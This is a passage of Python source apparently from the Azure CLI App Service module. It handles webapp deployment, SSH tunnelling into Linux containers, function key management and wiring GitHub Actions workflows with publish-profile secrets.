is a {} app. The code detected at '{}' will default to " "'{}'. Please create a new app " "to continue this operation. For more information on default behaviors, " "see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up." .format(name, current_os, src_dir, os_name)) _is_linux = plan_info.reserved # for an existing app check if the runtime version needs to be updated # Get site config to check the runtime version site_config = client.web_apps.get_configuration(rg_name, name) else: # need to create new app, check if we need to use default RG or use user entered values logger.warning("The webapp '%s' doesn't exist", name) sku = get_sku_to_use(src_dir, html, sku, runtime) loc = set_location(cmd, sku, location) rg_name = get_rg_to_use(user, resource_group_name) _create_new_rg = not check_resource_group_exists(cmd, rg_name) plan = get_plan_to_use(cmd=cmd, user=user, loc=loc, sku=sku, create_rg=_create_new_rg, resource_group_name=rg_name, plan=plan) dry_run_str = r""" { "name" : "%s", "appserviceplan" : "%s", "resourcegroup" : "%s", "sku": "%s", "os": "%s", "location" : "%s", "src_path" : "%s", "runtime_version_detected": "%s", "runtime_version": "%s" } """ % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version, runtime_version) create_json = json.loads(dry_run_str) if dryrun: logger.warning("Web app will be created with the below configuration,re-run command " "without the --dryrun flag to create & deploy a new app") return create_json if _create_new_rg: logger.warning("Creating Resource group '%s' ...", rg_name) create_resource_group(cmd, rg_name, loc) logger.warning("Resource group creation complete") # create ASP logger.warning("Creating AppServicePlan '%s' ...", plan) # we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are # updated we update those try: create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku, number_of_workers=1 if _is_linux else None, location=loc, app_service_environment=app_service_environment) except Exception as ex: # pylint: disable=broad-except if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location try: response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access except Exception: # pylint: disable=broad-except raise CLIInternalError(ex) raise UnclassifiedUserFault(response_content['error']['message']) raise AzureResponseError(ex) if _create_new_app: logger.warning("Creating webapp '%s' ...", name) create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None, using_webapp_up=True, language=language) _configure_default_logging(cmd, rg_name, name) else: # for existing app if we might need to update the stack runtime settings helper = _StackRuntimeHelper(cmd, client, linux=_is_linux) match = helper.resolve(runtime_version) if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version: if match and site_config.linux_fx_version != match['configs']['linux_fx_version']: logger.warning('Updating runtime version from %s to %s', site_config.linux_fx_version, match['configs']['linux_fx_version']) update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version']) logger.warning('Waiting for runtime version to propagate ...') time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this elif not match: logger.warning('Updating runtime version from %s to %s', site_config.linux_fx_version, runtime_version) update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version) logger.warning('Waiting for runtime version to propagate ...') time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this elif os_name.lower() == 'windows': # may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config if match: _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version) create_json['runtime_version'] = runtime_version # Zip contents & Deploy logger.warning("Creating zip with contents of dir %s ...", src_dir) # zip contents & deploy zip_file_path = zip_contents_from_dir(src_dir, language) enable_zip_deploy(cmd, rg_name, name, zip_file_path) if launch_browser: logger.warning("Launching app using default browser") view_in_browser(cmd, rg_name, name, None, logs) else: _url = _get_url(cmd, rg_name, name) logger.warning("You can launch the app at %s", _url) create_json.update({'URL': _url}) if logs: _configure_default_logging(cmd, rg_name, name) return get_streaming_log(cmd, rg_name, name) with ConfiguredDefaultSetter(cmd.cli_ctx.config, True): cmd.cli_ctx.config.set_value('defaults', 'group', rg_name) cmd.cli_ctx.config.set_value('defaults', 'sku', sku) cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan) cmd.cli_ctx.config.set_value('defaults', 'location', loc) cmd.cli_ctx.config.set_value('defaults', 'web', name) return create_json def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version): update_needed = False if 'node' in runtime_version: settings = [] for k, v in match['configs'].items(): for app_setting in site_config.app_settings: if app_setting.name == k and app_setting.value != v: update_needed = True settings.append('%s=%s', k, v) if update_needed: logger.warning('Updating runtime version to %s', runtime_version) update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None) else: for k, v in match['configs'].items(): if getattr(site_config, k, None) != v: update_needed = True setattr(site_config, k, v) if update_needed: logger.warning('Updating runtime version to %s', runtime_version) update_site_configs(cmd, rg_name, name, net_framework_version=site_config.net_framework_version, php_version=site_config.php_version, python_version=site_config.python_version, java_version=site_config.java_version, java_container=site_config.java_container, java_container_version=site_config.java_container_version) current_stack = get_current_stack_from_runtime(runtime_version) _update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack) if update_needed: logger.warning('Waiting for runtime version to propagate ...') time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack): if not current_stack: return # portal uses this current_stack value to display correct runtime for windows webapps client = web_client_factory(cmd.cli_ctx) app_metadata = client.web_apps.list_metadata(resource_group, name) if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack: app_metadata.properties["CURRENT_STACK"] = current_stack client.web_apps.update_metadata(resource_group, name, metadata=app_metadata) def _ping_scm_site(cmd, resource_group, name, instance=None): from azure.cli.core.util import should_disable_connection_verify # wake up kudu, by making an SCM call import requests # work around until the timeout limits issue for linux is investigated & fixed user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name) scm_url = _get_scm_url(cmd, resource_group, name) import urllib3 authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password)) cookies = {} if instance is not None: cookies['ARRAffinity'] = instance requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(), cookies=cookies) def is_webapp_up(tunnel_server): return tunnel_server.is_webapp_up() def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None): webapp = show_webapp(cmd, resource_group_name, name, slot) is_linux = webapp.reserved if not is_linux: raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan") profiles = list_publish_profiles(cmd, resource_group_name, name, slot) profile_user_name = next(p['userName'] for p in profiles) profile_user_password = next(p['userPWD'] for p in profiles) if port is None: port = 0 # Will auto-select a free port from 1024-65535 logger.info('No port defined, creating on random free port') # Validate that we have a known instance (case-sensitive) if instance is not None: instances = list_instances(cmd, resource_group_name, name, slot=slot) instance_names = set(i.name for i in instances) if instance not in instance_names: if slot is not None: raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance)) raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance)) scm_url = _get_scm_url(cmd, resource_group_name, name, slot) tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance) _ping_scm_site(cmd, resource_group_name, name, instance=instance) _wait_for_webapp(tunnel_server) return tunnel_server def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance) t = threading.Thread(target=_start_tunnel, args=(tunnel_server,)) t.daemon = True t.start() logger.warning('Opening tunnel on port: %s', tunnel_server.local_port) config = get_site_configs(cmd, resource_group_name, name, slot) if config.remote_debugging_enabled: logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port) else: ssh_user_name = 'root' ssh_user_password = 'Docker!' logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password) logger.warning('Ctrl + C to close') if timeout: time.sleep(int(timeout)) else: while t.is_alive(): time.sleep(5) def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance) t = threading.Thread(target=_start_tunnel, args=(tunnel_server,)) t.daemon = True t.start() ssh_user_name = 'root' ssh_user_password = 'Docker!' s = threading.Thread(target=_start_ssh_session, args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password)) s.daemon = True s.start() if timeout: time.sleep(int(timeout)) else: while s.is_alive() and t.is_alive(): time.sleep(5) def perform_onedeploy(cmd, resource_group_name, name, src_path=None, src_url=None, target_path=None, artifact_type=None, is_async=None, restart=None, clean=None, ignore_stack=None, timeout=None, slot=None): params = OneDeployParams() params.cmd = cmd params.resource_group_name = resource_group_name params.webapp_name = name params.src_path = src_path params.src_url = src_url params.target_path = target_path params.artifact_type = artifact_type params.is_async_deployment = is_async params.should_restart = restart params.is_clean_deployment = clean params.should_ignore_stack = ignore_stack params.timeout = timeout params.slot = slot return _perform_onedeploy_internal(params) # Class for OneDeploy parameters # pylint: disable=too-many-instance-attributes,too-few-public-methods class OneDeployParams: def __init__(self): self.cmd = None self.resource_group_name = None self.webapp_name = None self.src_path = None self.src_url = None self.artifact_type = None self.is_async_deployment = None self.target_path = None self.should_restart = None self.is_clean_deployment = None self.should_ignore_stack = None self.timeout = None self.slot = None # pylint: enable=too-many-instance-attributes,too-few-public-methods def _build_onedeploy_url(params): scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot) deploy_url = scm_url + '/api/publish?type=' + params.artifact_type if params.is_async_deployment is not None: deploy_url = deploy_url + '&async=' + str(params.is_async_deployment) if params.should_restart is not None: deploy_url = deploy_url + '&restart=' + str(params.should_restart) if params.is_clean_deployment is not None: deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment) if params.should_ignore_stack is not None: deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack) if params.target_path is not None: deploy_url = deploy_url + '&path=' + params.target_path return deploy_url def _get_onedeploy_status_url(params): scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot) return scm_url + '/api/deployments/latest' def _get_basic_headers(params): import urllib3 user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name, params.webapp_name, params.slot) if params.src_path: content_type = 'application/octet-stream' elif params.src_url: content_type = 'application/json' else: raise CLIError('Unable to determine source location of the artifact being deployed') headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password)) headers['Cache-Control'] = 'no-cache' headers['User-Agent'] = get_az_user_agent() headers['Content-Type'] = content_type return headers def _get_onedeploy_request_body(params): import os if params.src_path: logger.info('Deploying from local path: %s', params.src_path) try: with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs: body = fs.read() except Exception as e: # pylint: disable=broad-except raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it" .format(params.src_path)) from e elif params.src_url: logger.info('Deploying from URL: %s', params.src_url) body = json.dumps({ "packageUri": params.src_url }) else: raise CLIError('Unable to determine source location of the artifact being deployed') return body def _update_artifact_type(params): import ntpath if params.artifact_type is not None: return # Interpret deployment type from the file extension if the type parameter is not passed file_name = ntpath.basename(params.src_path) file_extension = file_name.split(".", 1)[1] if file_extension in ('war', 'jar', 'ear', 'zip'): params.artifact_type = file_extension elif file_extension in ('sh', 'bat'): params.artifact_type = 'startup' else: params.artifact_type = 'static' logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. " "Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type) def _make_onedeploy_request(params): import requests from azure.cli.core.util import ( should_disable_connection_verify, ) # Build the request body, headers, API URL and status URL body = _get_onedeploy_request_body(params) headers = _get_basic_headers(params) deploy_url = _build_onedeploy_url(params) deployment_status_url = _get_onedeploy_status_url(params) logger.info("Deployment API: %s", deploy_url) response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify()) # For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status # For that, set poll_async_deployment_for_debugging=True poll_async_deployment_for_debugging = True # check the status of async deployment if response.status_code == 202 or response.status_code == 200: response_body = None if poll_async_deployment_for_debugging: logger.info('Polling the status of async deployment') response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name, deployment_status_url, headers, params.timeout) logger.info('Async deployment complete. Server response: %s', response_body) return response_body # API not available yet! if response.status_code == 404: raise CLIError("This API isn't available in this environment yet!") # check if there's an ongoing process if response.status_code == 409: raise CLIError("Another deployment is in progress. Please wait until that process is complete before " "starting a new deployment. You can track the ongoing deployment at {}" .format(deployment_status_url)) # check if an error occured during deployment if response.status_code: raise CLIError("An error occured during deployment. Status Code: {}, Details: {}" .format(response.status_code, response.text)) # OneDeploy def _perform_onedeploy_internal(params): # Update artifact type, if required _update_artifact_type(params) # Now make the OneDeploy API call logger.info("Initiating deployment") response = _make_onedeploy_request(params) logger.info("Deployment has completed successfully") return response def _wait_for_webapp(tunnel_server): tries = 0 while True: if is_webapp_up(tunnel_server): break if tries == 0: logger.warning('Connection is not ready yet, please wait') if tries == 60: raise CLIError('SSH timeout, your app must be running before' ' it can accept SSH connections. ' 'Use `az webapp log tail` to review the app startup logs.') tries = tries + 1 logger.warning('.') time.sleep(1) def _start_tunnel(tunnel_server): tunnel_server.start_server() def _start_ssh_session(hostname, port, username, password): tries = 0 while True: try: c = Connection(host=hostname, port=port, user=username, # connect_timeout=60*10, connect_kwargs={"password": password}) break except Exception as ex: # pylint: disable=broad-except logger.info(ex) if tries == 0: logger.warning('Connection is not ready yet, please wait') if tries == 60: raise CLIError("Timeout Error, Unable to establish a connection") tries = tries + 1 logger.warning('.') time.sleep(1) try: try: c.run('cat /etc/motd', pty=True) except invoke.exceptions.UnexpectedExit: # Don't crash over a non-existing /etc/motd. pass c.run('source /etc/profile; exec $SHELL -l', pty=True) except Exception as ex: # pylint: disable=broad-except logger.info(ex) finally: c.close() def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements import platform if platform.system() == "Windows": webapp = show_webapp(cmd, resource_group_name, name, slot) is_linux = webapp.reserved if not is_linux: raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan") scm_url = _get_scm_url(cmd, resource_group_name, name, slot) if not instance: open_page_in_browser(scm_url + '/webssh/host') else: open_page_in_browser(scm_url + '/webssh/host?instance={}'.format(instance)) else: config = get_site_configs(cmd, resource_group_name, name, slot) if config.remote_debugging_enabled: raise ValidationError('Remote debugging is enabled, please disable') create_tunnel_and_session( cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance) def _configure_default_logging(cmd, rg_name, name): logger.warning("Configuring default logging for the app, if not already enabled") return config_diagnostics(cmd, rg_name, name, application_logging=True, web_server_logging='filesystem', docker_container_logging='true') def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name): ase_is_id = is_valid_resource_id(ase) if ase_is_id: return ase from azure.cli.core.commands.client_factory import get_subscription_id return resource_id( subscription=get_subscription_id(cli_ctx), resource_group=resource_group_name, namespace='Microsoft.Web', type='hostingEnvironments', name=ase) def _format_key_vault_id(cli_ctx, key_vault, resource_group_name): key_vault_is_id = is_valid_resource_id(key_vault) if key_vault_is_id: return key_vault from azure.cli.core.commands.client_factory import get_subscription_id return resource_id( subscription=get_subscription_id(cli_ctx), resource_group=resource_group_name, namespace='Microsoft.KeyVault', type='vaults', name=key_vault) def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None): hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_host_name_bindings', slot) verified_hostname_found = False for hostname_binding in hostname_bindings: binding_name = hostname_binding.name.split('/')[-1] if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or hostname_binding.host_name_type == 'Managed'): verified_hostname_found = True return verified_hostname_found def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None): # pylint: disable=protected-access key_info = KeyInfo(name=key_name, value=key_value) KeyInfo._attribute_map = { 'name': {'key': 'properties.name', 'type': 'str'}, 'value': {'key': 'properties.value', 'type': 'str'}, } client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.create_or_update_host_secret_slot(resource_group_name, name, key_type, key_name, slot, key=key_info) return client.web_apps.create_or_update_host_secret(resource_group_name, name, key_type, key_name, key=key_info) def list_host_keys(cmd, resource_group_name, name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.list_host_keys_slot(resource_group_name, name, slot) return client.web_apps.list_host_keys(resource_group_name, name) def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot) return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name) def show_function(cmd, resource_group_name, name, function_name): client = web_client_factory(cmd.cli_ctx) result = client.web_apps.get_function(resource_group_name, name, function_name) if result is None: return "Function '{}' does not exist in app '{}'".format(function_name, name) return result def delete_function(cmd, resource_group_name, name, function_name): client = web_client_factory(cmd.cli_ctx) result = client.web_apps.delete_function(resource_group_name, name, function_name) return result def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None): # pylint: disable=protected-access key_info = KeyInfo(name=key_name, value=key_value) KeyInfo._attribute_map = { 'name': {'key': 'properties.name', 'type': 'str'}, 'value': {'key': 'properties.value', 'type': 'str'}, } client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.create_or_update_function_secret_slot(resource_group_name, name, function_name, key_name, slot, key_info) return client.web_apps.create_or_update_function_secret(resource_group_name, name, function_name, key_name, key_info) def list_function_keys(cmd, resource_group_name, name, function_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot) return client.web_apps.list_function_keys(resource_group_name, name, function_name) def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot) return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name) def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches branch='master', login_with_github=False, force=False): if not token and not login_with_github: raise_missing_token_suggestion() elif not token: scopes = ["admin:repo_hook", "repo", "workflow"] token = get_github_access_token(cmd, scopes) elif token and login_with_github: logger.warning("Both token and --login-with-github flag are provided. Will use provided token") # Verify resource group, app site_availability = get_site_availability(cmd, name) if site_availability.name_available or (not site_availability.name_available and site_availability.reason == 'Invalid'): raise ResourceNotFoundError( "The Resource 'Microsoft.Web/sites/%s' under resource group '%s' " "was not found." % (name, resource_group)) app_details = get_app_details(cmd, name) if app_details is None: raise ResourceNotFoundError( "Unable to retrieve details of the existing app %s. Please check that the app is a part of " "the current subscription" % name) current_rg = app_details.resource_group if resource_group is not None and (resource_group.lower() != current_rg.lower()): raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the " "value entered %s. Please re-run command with the correct " "parameters." % (name, current_rg, resource_group)) parsed_plan_id = parse_resource_id(app_details.server_farm_id) client = web_client_factory(cmd.cli_ctx) plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name']) is_linux = plan_info.reserved # Verify github repo from github import Github, GithubException from github.GithubException import BadCredentialsException, UnknownObjectException if repo.strip()[-1] == '/': repo = repo.strip()[:-1] g = Github(token) github_repo = None try: github_repo = g.get_repo(repo) try: github_repo.get_branch(branch=branch) except GithubException as e: error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo) if e.data and e.data['message']: error_msg += " Error: {}".format(e.data['message']) raise CLIError(error_msg) logger.warning('Verified GitHub repo and branch') except BadCredentialsException: raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use " "the --token argument. Run 'az webapp deployment github-actions add --help' " "for more information.") except GithubException as e: error_msg = "Encountered GitHub error when accessing {} repo".format(repo) if e.data and e.data['message']: error_msg += " Error: {}".format(e.data['message']) raise CLIError(error_msg) # Verify runtime app_runtime_info = _get_app_runtime_info( cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux) app_runtime_string = None if(app_runtime_info and app_runtime_info['display_name']): app_runtime_string = app_runtime_info['display_name'] github_actions_version = None if (app_runtime_info and app_runtime_info['github_actions_version']): github_actions_version = app_runtime_info['github_actions_version'] if runtime and app_runtime_string: if app_runtime_string.lower() != runtime.lower(): logger.warning('The app runtime: {app_runtime_string} does not match the runtime specified: ' '{runtime}. Using the specified runtime {runtime}.') app_runtime_string = runtime elif runtime: app_runtime_string = runtime if not app_runtime_string: raise CLIError('Could not detect runtime. Please specify using the --runtime flag.') if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux): raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string) # Get workflow template logger.warning('Getting workflow template using runtime: %s', app_runtime_string) workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux) # Fill workflow template guid = str(uuid.uuid4()).replace('-', '') publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid) logger.warning( 'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s', name, branch, github_actions_version, slot if slot else 'production') completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name, branch=branch, slot=slot, publish_profile=publish_profile_name, version=github_actions_version) completed_workflow_file = completed_workflow_file.encode() # Check if workflow exists in repo, otherwise push if slot: file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot) else: file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower()) dir_path = "{}/{}".format('.github', 'workflows') file_path = "/{}/{}".format(dir_path, file_name) try: existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch) existing_publish_profile_name = _get_publish_profile_from_workflow_file( workflow_file=str(existing_workflow_file.decoded_content)) if existing_publish_profile_name: completed_workflow_file = completed_workflow_file.decode() completed_workflow_file = completed_workflow_file.replace( publish_profile_name, existing_publish_profile_name) completed_workflow_file = completed_workflow_file.encode() publish_profile_name = existing_publish_profile_name logger.warning("Existing workflow file found") if force: logger.warning("Replacing the existing workflow file") github_repo.update_file(path=file_path, message="Update workflow using Azure CLI", content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch) else: option = prompt_y_n('Replace existing workflow file?') if option: logger.warning("Replacing the existing workflow file") github_repo.update_file(path=file_path, message="Update workflow using Azure CLI", content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch) else: logger.warning("Use the existing workflow file") if existing_publish_profile_name: publish_profile_name = existing_publish_profile_name except UnknownObjectException: logger.warning("Creating new workflow file: %s", file_path) github_repo.create_file(path=file_path, message="Create workflow using Azure CLI", content=completed_workflow_file, branch=branch) # Add publish profile to GitHub logger.warning('Adding publish profile to GitHub') _add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token, github_actions_secret_name=publish_profile_name, slot=slot) # Set site source control properties _update_site_source_control_properties_for_gh_action( cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot) github_actions_url = "https://github.com/{}/actions".format(repo) return github_actions_url def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements branch='master', login_with_github=False): if not token and not login_with_github: raise_missing_token_suggestion() elif not token: scopes = ["admin:repo_hook", "repo", "workflow"] token = get_github_access_token(cmd, scopes) elif token and login_with_github: logger.warning("Both token and --login-with-github flag are provided. Will use provided token") # Verify resource group, app site_availability = get_site_availability(cmd, name) if site_availability.name_available or (not site_availability.name_available and site_availability.reason == 'Invalid'): raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." % (name, resource_group)) app_details = get_app_details(cmd, name) if app_details is None: raise CLIError("Unable to retrieve details of the existing app %s. " "Please check that the app is a part of the current subscription" % name) current_rg = app_details.resource_group if resource_group is not None and (resource_group.lower() != current_rg.lower()): raise CLIError("The webapp %s exists in ResourceGroup %s and does not match " "the value entered %s. Please re-run command with the correct " "parameters." % (name, current_rg, resource_group)) # Verify github repo from github import Github, GithubException from github.GithubException import BadCredentialsException, UnknownObjectException if repo.strip()[-1] == '/': repo = repo.strip()[:-1] g = Github(token) github_repo = None try: github_repo = g.get_repo(repo) try: github_repo.get_branch(branch=branch) except GithubException as e: error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo) if e.data and e.data['message']: error_msg += " Error: {}".format(e.data['message']) raise CLIError(error_msg) logger.warning('Verified GitHub repo and branch') except BadCredentialsException: raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use " "the --token argument. Run 'az webapp deployment github-actions add --help' " "for more information.") except GithubException as e: error_msg = "Encountered GitHub error when accessing {} repo".format(repo) if e.data and e.data['message']: error_msg += " Error: {}".format(e.data['message']) raise CLIError(error_msg) # Check if workflow exists in repo and remove file_name = "{}_{}({}).yml".format( branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format( branch.replace('/', '-'), name.lower()) dir_path = "{}/{}".format('.github', 'workflows') file_path = "/{}/{}".format(dir_path, file_name) existing_publish_profile_name = None try: existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch) existing_publish_profile_name = _get_publish_profile_from_workflow_file( workflow_file=str(existing_workflow_file.decoded_content)) logger.warning("Removing the existing workflow file") github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions", sha=existing_workflow_file.sha, branch=branch) except UnknownObjectException as e: error_msg = "Error when removing workflow file." if e.data and e.data['message']: error_msg += " Error: {}".format(e.data['message']) raise CLIError(error_msg) # Remove publish profile from GitHub if existing_publish_profile_name: logger.warning('Removing publish profile from GitHub') _remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token, github_actions_secret_name=existing_publish_profile_name, slot=slot) # Remove site source control properties delete_source_control(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) return "Disconnected successfully." def _get_publish_profile_from_workflow_file(workflow_file): import re publish_profile = None regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file) if regex: publish_profile = regex.group() publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '') publish_profile = publish_profile[:-2] if publish_profile: return publish_profile.strip() return None def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None, branch="master", slot=None): if repo: repo_url = 'https://github.com/' + repo else: repo_url = None site_source_control = show_source_control(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) if site_source_control: if not repo_url: repo_url = site_source_control.repo_url delete_source_control(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) config_source_control(cmd=cmd, resource_group_name=resource_group, name=name, repo_url=repo_url, repository_type='github', github_action=True, branch=branch, git_token=token, slot=slot) def _get_workflow_template(github, runtime_string, is_linux): from github import GithubException from github.GithubException import BadCredentialsException file_contents = None template_repo_path = 'Azure/actions-workflow-templates' template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux) try: template_repo = github.get_repo(template_repo_path) file_contents = template_repo.get_contents(template_file_path) except BadCredentialsException: raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use " "the --token argument. Run 'az webapp deployment github-actions add --help' " "for more information.") except GithubException as e: error_msg = "Encountered GitHub error when retrieving workflow template" if e.data and e.data['message']: error_msg += ": {}".format(e.data['message']) raise CLIError(error_msg) return file_contents def _fill_workflow_template(content, name, branch, slot, publish_profile, version): if not slot: slot = 'production' content = content.replace('${web-app-name}', name) content = content.replace('${branch}', branch) content = content.replace('${slot-name}', slot) content = content.replace('${azure-webapp-publish-profile-name}', publish_profile) content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile) content = content.replace('${dotnet-core-version}', version) content = content.replace('${java-version}', version) content = content.replace('${node-version}', version) content = content.replace('${python-version}', version) return content def _get_template_file_path(runtime_string, is_linux): if not runtime_string: raise CLIError('Unable to retrieve workflow template') runtime_string = runtime_string.lower() runtime_stack = runtime_string.split('|')[0] template_file_path = None if is_linux: template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None) else: # Handle java naming if runtime_stack == 'java': java_container_split = runtime_string.split('|') if java_container_split and len(java_container_split) >= 2: if java_container_split[2] == 'tomcat': runtime_stack = 'tomcat' elif java_container_split[2] == 'java se': runtime_stack = 'java' template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None) if not template_file_path: raise CLIError('Unable to retrieve workflow template.') return template_file_path def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None): # Get publish profile with secrets import requests logger.warning("Fetching publish profile with secrets for the app '%s'", name) publish_profile_bytes = _generic_site_operation( cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"}) publish_profile = list(publish_profile_bytes) if publish_profile: publish_profile = publish_profile[0].decode('ascii') else: raise CLIError('Unable to retrieve publish profile.') # Add publish profile with secrets as a GitHub Actions Secret in the repo headers = {} headers['Authorization'] = 'Token {}'.format(token) headers['Content-Type'] = 'application/json;' headers['Accept'] = 'application/json;' public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo) public_key = requests.get(public_key_url, headers=headers) if not public_key.ok: raise CLIError('Request to GitHub for public key failed.') public_key = public_key.json() encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'], secret_value=str(publish_profile)) payload = { "encrypted_value": encrypted_github_actions_secret, "key_id": public_key['key_id'] } store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name) stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers) if str(stored_secret.status_code)[0] != '2': raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code) def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, 